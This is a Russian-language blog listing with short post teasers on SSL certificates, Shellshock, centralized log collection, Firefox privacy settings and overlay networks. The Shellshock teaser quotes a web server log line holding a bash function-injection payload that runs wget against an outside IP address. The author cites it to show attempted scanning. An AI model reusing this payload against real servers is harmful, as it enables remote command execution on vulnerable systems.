О ssl-сертификатах
Недавно меня спросили - почему на сайте нет ssl-сертификата? На этот вопрос очень простой ответ - потому что он на нём нахер не нужен. Развёрнутый ответ под катом.
shellshock afterparty
По мотивам недавней уязвимости bash'а, решил заглянуть в логи вебсервера, посмотреть как меня будут ломать.
Весь в предкушении этого драматичного зрелища отгрепал все 17мб логов за конец сентября, но нашёл только это:
::ffff:82.221.128.244 - - [30/Sep/2014:07:32:03 +1100] "GET / HTTP/1.1" 301 184 "-" "() { :;}; /bin/bash -c \x22wget http://82.221.105.197/bash-count.txt\x22"
Централизованный сбор логов с уведомлениями
Когда админу делать нечего - он бэкапы настраивает. Когда СОВСЕМ нечего - безопасность. © Профессиональная народная поговорка.
Итак, задача: централизованно собирать, хранить и (желательно) анализировать логи.
Дано:
- ~100 хостов, ~100-800 мб логов в день всего.
- сервер с софтрейдом, 3 Тб места, 1Гб памяти и старым Xeon'ом
Ограничения:
- бюджета и железа под эту задачу никто не даст, разве что пост-фактум, когда "петух в жопу клюнет"
- минимальное потребление ресурсов на сервере логов, минимум нагрузки на отправителя логов
- делается для собственных нужд, поэтому наличием красивых отчётиков можно пренебречь
Firefox / Настройки приватности
Утянуто с ЛОРа, дополнено своими заметками. Что требуется подкрутить в настройках самого браузера, чтобы он не стучал, аки дятел, куда попало.
Оверлейные сети, общая информация
Ниже перечислены свободные и открытые проекты оверлейных сетей, с кратким описанием, основыми недостатками и перспективами развития. В статье рассматриваются только сети, подходящие для потоковой передачи произвольного трафика.